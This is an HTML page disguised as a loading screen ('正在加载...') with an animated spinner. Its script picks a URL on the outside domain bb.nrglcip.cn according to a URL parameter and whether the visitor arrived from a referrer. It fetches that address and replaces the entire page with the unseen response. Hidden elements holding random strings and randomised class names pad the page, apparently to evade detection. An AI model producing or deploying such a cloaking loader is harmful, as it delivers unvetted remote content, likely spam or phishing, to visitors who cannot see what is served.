<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .I2e9ANH {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .I2e9ANH .j0px1zVH {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .I2e9ANH .content {
            line-height: 50px;
            text-align: center
        }

        .I2e9ANH .img {
            width: 100%
        }

        .I2e9ANH .O9S0VBk0 {
            text-align: center
        }

        .I2e9ANH .O9S0VBk0 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .I2e9ANH .O9S0VBk0 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .I2e9ANH .O9S0VBk0 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .I2e9ANH .O9S0VBk0 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .I2e9ANH .O9S0VBk0 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .I2e9ANH .O9S0VBk0 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .I2e9ANH .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function UWdTWBmV2w2lp(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var wyqHM = UWdTWBmV2w2lp('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ wyqHM +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ wyqHM +".html?a=share";
		}
		
        kq4fujNuh=url+"#"+new Date().getTime();
        kq4fujNuh && function() {
            $.get(kq4fujNuh, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<p  style='display:none'>ugycNqsrwJGrER</p>
<img  src='' style='display:none'>
<span style='display:none'>BhEPIuGjVrRYMbZ0Cb</span>
<h1 style='display:none' >hL792yY6iTyNe9NCE5g9FyTyyAYbwrJMuy2H8Q6hqP0AU8OvrsT9ATbP4uxr6qBC3BgKk</h1>
<a  href='#' style='display:none'>Gn6ErHpLcZ72d5eQdbKLraUNyJBAWWy9Gh2S9tHO5RWgwwDWvwGIzL79lRBCahVg5tRlZGF66</a><div class="I2e9ANH">
    <div class="j0px1zVH">
        <div class="O9S0VBk0">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >yMOY7PtB1cT45SOuSm6lNsQVRhcTcB5jYlIZEU8I9AO7UTelopKruDbQdAialahFEolKQ3u0p2ec1hxw05</h1>
<b style='display:none' >gMwDjZ08hchbjq</b>
<h1 style='display:none' >yMOY7PtB1cT45SOuSm6lNsQVRhcTcB5jYlIZEU8I9AO7UTelopKruDbQdAialahFEolKQ3u0p2ec1hxw05</h1>
<span style='display:none'>lue4lVtk95Z16W1bMx3dEimZvbM</span>
<div style='display:none'>HWqMWsyAZhHbd5htbXQAjStI8mKD4xtLgBwkytJis</div>
<ul style='display:none' >bhuYiIVLtQACtJGZ62BTq6TA4t2H33aR2vKXsQiKjq2tJyDFjiTSIYjBAS2p274PZtqYQQ1WOl6qZWt4He9Iu4TzHGM71SiYzw</ul></body>
</html>